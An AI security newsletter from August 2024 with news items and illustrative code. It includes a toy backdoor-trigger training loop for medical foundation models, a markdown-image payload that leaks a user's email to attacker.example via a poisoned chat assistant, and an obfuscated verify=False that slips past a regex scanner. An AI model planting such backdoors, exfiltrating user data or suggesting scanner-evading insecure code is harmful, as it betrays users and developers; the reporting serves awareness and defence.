AI Security Newsletter (Aug. 26, 2024)
Technology & Tools
GitHub’s AI Revolution in Code Security
GitHub has introduced Copilot Autofix, an AI-driven tool within its Advanced Security suite that identifies code vulnerabilities and proposes fixes for them. By analyzing flaws and suggesting corrections, Copilot Autofix enables developers, especially those on GitHub Enterprise Cloud, to address security issues more efficiently. Beginning in September, it will also be available free of charge to open source projects, marking a significant step toward faster and smarter secure software development.
NVIDIA Unveils Compact Mistral-NeMo-Minitron 8B Model
NVIDIA has launched Mistral-NeMo-Minitron 8B, a compact yet highly accurate language model designed for GPU-accelerated environments. A downsized version of Mistral NeMo 12B, the model delivers state-of-the-art accuracy while remaining efficient enough to run on workstations. It excels across AI applications, from chatbots to educational tools, thanks to model-compression techniques such as pruning and distillation. NVIDIA also introduced Nemotron-Mini-4B-Instruct for even lower memory usage; both models extend NVIDIA's suite of AI-driven digital human technologies.
https://blogs.nvidia.com/blog/mistral-nemo-minitron-8b-small-language-model
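Pruning and distillation are well-established compression recipes: a trimmed-down student model is trained to match the output distribution of a larger teacher. The snippet below is a generic PyTorch sketch of a distillation loss; the temperature, batch shape, and vocabulary size are arbitrary placeholders and do not reflect NVIDIA's actual training pipeline.

```python
# Minimal sketch of knowledge distillation: a large "teacher" model's soft
# predictions guide a smaller "student" model. All sizes here are illustrative
# placeholders, not details of the Minitron training setup.
import torch
import torch.nn.functional as F

def distillation_loss(student_logits, teacher_logits, temperature=2.0):
    """KL divergence between softened teacher and student distributions."""
    t = temperature
    student_log_probs = F.log_softmax(student_logits / t, dim=-1)
    teacher_probs = F.softmax(teacher_logits / t, dim=-1)
    # Scale by t^2 so gradient magnitudes stay comparable across temperatures.
    return F.kl_div(student_log_probs, teacher_probs, reduction="batchmean") * (t * t)

# Toy usage: a batch of 4 token positions over a 32k-entry vocabulary.
student_logits = torch.randn(4, 32000, requires_grad=True)
teacher_logits = torch.randn(4, 32000)
loss = distillation_loss(student_logits, teacher_logits)
loss.backward()
print(float(loss))
```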
Microsoft Unveils Enhanced Phi-3.5 SLMs with Multi-Lingual and Image Understanding Capabilities
Microsoft’s latest update to its Small Language Models (SLMs), the Phi-3.5 series, introduces significant enhancements in multi-lingual support and image understanding. The Phi-3.5-mini model now supports a wider range of languages with improved performance, while the new Phi-3.5-MoE model combines 16 experts for high-quality, efficient multi-lingual support and reduced latency. Additionally, the Phi-3.5-vision model advances multi-frame image understanding, setting new benchmarks in image analysis. These updates offer Azure customers and the open-source community more versatile and powerful tools for building generative AI applications, maintaining Microsoft’s commitment to cost-effective, high-performance AI solutions.
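For readers unfamiliar with mixture-of-experts layers: a small gating network scores a pool of expert sub-networks per token and routes each token through only the top-scoring few, which is how a many-expert model can keep compute and latency low. The toy layer below sketches that routing pattern in PyTorch; the dimensions, top-k value, and naive looping implementation are illustrative assumptions, not Phi-3.5-MoE's architecture or code.

```python
# Minimal sketch of mixture-of-experts routing: a gate scores experts per token
# and only the top-k experts run. 16 experts / top-2 mirrors the general idea;
# the hidden sizes are arbitrary.
import torch
import torch.nn as nn
import torch.nn.functional as F

class TinyMoELayer(nn.Module):
    def __init__(self, d_model=64, d_ff=128, num_experts=16, top_k=2):
        super().__init__()
        self.gate = nn.Linear(d_model, num_experts)
        self.experts = nn.ModuleList([
            nn.Sequential(nn.Linear(d_model, d_ff), nn.GELU(), nn.Linear(d_ff, d_model))
            for _ in range(num_experts)
        ])
        self.top_k = top_k

    def forward(self, x):                                   # x: (tokens, d_model)
        scores = F.softmax(self.gate(x), dim=-1)             # (tokens, num_experts)
        weights, indices = scores.topk(self.top_k, dim=-1)
        weights = weights / weights.sum(dim=-1, keepdim=True) # renormalize the top-k
        out = torch.zeros_like(x)
        for k in range(self.top_k):
            for e, expert in enumerate(self.experts):
                mask = indices[:, k] == e                     # tokens routed to expert e
                if mask.any():
                    out[mask] += weights[mask, k].unsqueeze(-1) * expert(x[mask])
        return out

layer = TinyMoELayer()
print(layer(torch.randn(8, 64)).shape)  # torch.Size([8, 64])
```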
LinkedIn Boosts Security with AI-Driven Platform
LinkedIn has significantly upgraded its security posture management by introducing the Security Posture Platform (SPP), which uses AI to automate data analysis and has improved vulnerability response times by roughly 150%. The platform, enriched with a Security Knowledge Graph, offers a dynamic, comprehensive view of LinkedIn's digital infrastructure, enabling proactive risk management and mitigation. By integrating AI, SPP streamlines operations, reduces manual intervention, and improves coverage of and responsiveness to emerging threats, marking a pivotal advancement in LinkedIn's security strategy.
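The write-up describes the Security Knowledge Graph only at a high level, but the underlying idea of modeling assets, vulnerabilities, and owners as a queryable graph is easy to picture. The snippet below is a purely hypothetical sketch using networkx; the node names, edge relations, and query are invented for illustration and are not LinkedIn's SPP schema.

```python
# Hypothetical sketch of a "security knowledge graph": assets, vulnerabilities,
# and ownership as graph edges that can be queried for exposure.
import networkx as nx

g = nx.DiGraph()
g.add_edge("payments-api", "CVE-2024-0001", relation="affected_by")
g.add_edge("payments-api", "internet", relation="exposed_to")
g.add_edge("payments-api", "team-payments", relation="owned_by")
g.add_edge("internal-batch-job", "CVE-2024-0001", relation="affected_by")

def exposed_assets(graph, cve):
    """Internet-exposed assets affected by a given CVE, plus their owners."""
    for asset, target, data in graph.edges(data=True):
        if target == cve and data["relation"] == "affected_by":
            if graph.has_edge(asset, "internet"):
                owners = [t for _, t, d in graph.out_edges(asset, data=True)
                          if d["relation"] == "owned_by"]
                yield asset, owners

print(list(exposed_assets(g, "CVE-2024-0001")))  # [('payments-api', ['team-payments'])]
```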
AI Security Incidents and Risks
Novel Backdoor Attack Method Exposed in Medical Foundation Models
Researchers at Mohamed bin Zayed University of AI have unveiled BAPLe, a novel backdoor attack that targets medical foundation models (Med-FMs) during the prompt learning phase. The technique requires only a small amount of data: it embeds an imperceptible noise trigger, learned alongside the text prompts, into Med-FMs, and achieves a high success rate across multiple models and datasets. The study highlights the vulnerability of Med-FMs to backdoor attacks and urges the development of secure models before real-world deployment.
https://asif-hanif.github.io/baple/
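To make the attack pattern concrete: during prompt learning the frozen backbone stays untouched, while a small, bounded noise trigger and the learnable prompts are optimized jointly so that triggered inputs flip to an attacker-chosen class and clean accuracy is preserved. The toy reconstruction below sketches that joint objective under simplified assumptions (random data, a linear stand-in encoder); it is a generic illustration, not the BAPLe authors' code or setup.

```python
# Illustrative sketch of a backdoor planted during prompt learning: a bounded
# learnable trigger plus learnable prompt embeddings are trained so triggered
# inputs map to a target class while clean inputs stay correct.
import torch
import torch.nn.functional as F

torch.manual_seed(0)
d, num_classes, eps = 32, 4, 0.03
frozen_encoder = torch.nn.Linear(d, d)          # stand-in for a frozen backbone
for p in frozen_encoder.parameters():
    p.requires_grad_(False)

prompt = torch.zeros(num_classes, d, requires_grad=True)  # learnable "text prompts"
trigger = torch.zeros(d, requires_grad=True)               # learnable noise trigger
opt = torch.optim.Adam([prompt, trigger], lr=1e-2)
target_class = 0

for step in range(200):
    x = torch.randn(16, d)                                  # toy "clean" inputs
    y = torch.randint(0, num_classes, (16,))
    clean_logits = frozen_encoder(x) @ prompt.t()
    poisoned = x + eps * torch.tanh(trigger)                # small, bounded perturbation
    poison_logits = frozen_encoder(poisoned) @ prompt.t()
    # Keep clean behavior intact AND force triggered inputs to the target class.
    loss = F.cross_entropy(clean_logits, y) + \
           F.cross_entropy(poison_logits, torch.full_like(y, target_class))
    opt.zero_grad(); loss.backward(); opt.step()
```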
AI’s Role in Election Influence Thwarted
OpenAI recently dismantled an Iranian operation, Storm-2035, which exploited ChatGPT to craft content aimed at swaying the US presidential election. Despite generating a range of materials from long articles to social media comments on hot-button issues like the US election and the Israel-Gaza conflict, the campaign failed to gain significant traction online. OpenAI has since banned the accounts involved and remains vigilant against policy violations, underscoring the ongoing battle against misuse of AI in political manipulation.
https://www.theguardian.com/technology/article/2024/aug/16/open-ai-chatgpt-iran
Hugging Face AI Vulnerabilities Exposed
Researchers have unveiled vulnerabilities in Hugging Face’s AI chat assistants, demonstrating how they can be manipulated to stealthily extract user email addresses. By employing techniques like Sleepy Agent and Image Markdown Rendering, attackers can create seemingly benign assistants that, upon receiving specific triggers such as an email input, secretly send that information to an attacker’s server. Although Hugging Face has been alerted to these risks, the platform’s open nature and its reliance on users to review an assistant’s system prompt before use leave it susceptible to such attacks. This revelation underscores the importance of users being cautious and informed about the AI tools they interact with online.
https://www.lasso.security/blog/exploiting-huggingfaces-assistants-to-extract-users-data
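The image-markdown exfiltration trick is worth spelling out because it needs no code execution at all: a poisoned assistant simply replies with a markdown image whose URL embeds the user's input, and the chat client leaks the data the moment it fetches that image. The sketch below shows the shape of such a payload; the attacker domain, endpoint, and assistant behavior are hypothetical, not taken from the Lasso write-up.

```python
# Illustrative shape of an image-markdown exfiltration payload. The domain and
# query parameter are hypothetical; any client that auto-renders markdown
# images would issue the GET request and deliver the value to the attacker.
from urllib.parse import quote

ATTACKER_HOST = "https://attacker.example"   # hypothetical collection endpoint

def malicious_markdown(leaked_value: str) -> str:
    """What a compromised assistant might emit after the user enters an email."""
    return f"![img]({ATTACKER_HOST}/log?q={quote(leaked_value)})"

print(malicious_markdown("alice@example.com"))
# ![img](https://attacker.example/log?q=alice%40example.com)
```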
DeepMind’s AGI Safety Team Expands Efforts in AI Risk Mitigation
Google DeepMind’s AGI Safety & Alignment team, led by notable figures such as Anca Dragan and Shane Legg, is intensifying its efforts to mitigate existential risks posed by AI. Having grown 39% last year and continuing to expand, the team focuses on amplified oversight, frontier safety analysis, and mechanistic interpretability of AI models. Its work, including the development of the Frontier Safety Framework and innovations in understanding how models work internally, sets new standards in AI safety and existential risk mitigation.
Researchers Uncover CodeBreaker Technique to Poison AI Code Suggestions
A team from three universities has developed CodeBreaker, a method that can poison AI-driven code completion tools, making them suggest vulnerable code undetectable by static analysis tools. This advancement in poisoning large language models (LLMs) requires developers to scrutinize AI-generated code more than ever, emphasizing the need for a critical approach towards code suggestions for security. The research, presented at the USENIX Security Symposium, highlights the evolving challenge of ensuring AI-generated code’s security amidst the potential for malicious data poisoning.
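The core reason such poisoning is hard to catch is that a vulnerable suggestion can be rewritten so that signature- or pattern-based scanners no longer recognize it. The example below is a generic illustration of that evasion idea, using disabled TLS verification expressed in two equivalent forms; it is not one of CodeBreaker's actual payload transformations.

```python
# Why naive pattern-based checks can miss poisoned code suggestions: the same
# insecure behavior (disabling TLS verification) written plainly vs. obfuscated.
import re

plain_suggestion = 'requests.get(url, verify=False)'

# A poisoned model could suggest a semantically identical but transformed form,
# building the keyword argument at runtime so the literal pattern never appears:
obfuscated_suggestion = 'requests.get(url, **{"".join(["ver", "ify"]): False})'

naive_rule = re.compile(r"verify\s*=\s*False")
print(bool(naive_rule.search(plain_suggestion)))       # True  -> flagged
print(bool(naive_rule.search(obfuscated_suggestion)))  # False -> slips past the rule
```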
Business and Products
McAfee Introduces AI-powered Deepfake Detector on Lenovo AI PCs
McAfee has launched the world’s first automatic AI-powered Deepfake Detector, now available exclusively on select Lenovo AI PCs. This technology, boasting a 96% accuracy rate, alerts users within seconds if AI-generated audio is detected in a video, helping consumers discern real from fake content. Developed with privacy in mind, the Deepfake Detector runs directly on the device, leveraging the Neural Processing Unit (NPU) for improved performance and privacy. This collaboration between McAfee and Lenovo aims to help users navigate the digital world safely amid rising concern over AI-generated scams and misinformation.
https://news.lenovo.com/pressroom/press-releases/mcafee-first-automatic-ai-powered-deepfake-detector
AMD Advances AI PC Era with Ryzen AI 300 Chips and Developer Engagement
AMD is intensifying its push into the AI PC market with its Ryzen AI 300 chips, aiming to transform computing with neural processing units (NPUs) designed for AI tasks. In an Engadget Podcast interview, AMD executives outlined a strategy to attract developers to build AI-powered applications, emphasizing a robust software stack, high-performance hardware, and open-source tooling such as ONNX. The company also highlighted its collaboration with Microsoft and OEMs.
Opinions & Analysis
Gartner’s 2024 Hype Cycle Spotlights Key Tech Trends
Gartner’s 2024 Hype Cycle for Emerging Technologies identifies 25 disruptive technologies across four main areas: autonomous AI, developer productivity, total experience, and human-centric security and privacy. Highlighting the shift from foundational AI models to ROI-driven use cases, the report underscores the importance of autonomous AI systems capable of minimal human oversight. It also emphasizes enhancing developer productivity through advanced tools, creating superior shared experiences via total experience strategies, and integrating human-centric approaches to security and privacy. These technologies are poised to offer transformational benefits within the next decade.
